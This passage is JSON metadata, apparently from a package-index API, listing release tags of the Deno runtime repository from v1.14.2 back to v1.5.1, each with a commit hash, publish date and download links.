2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1"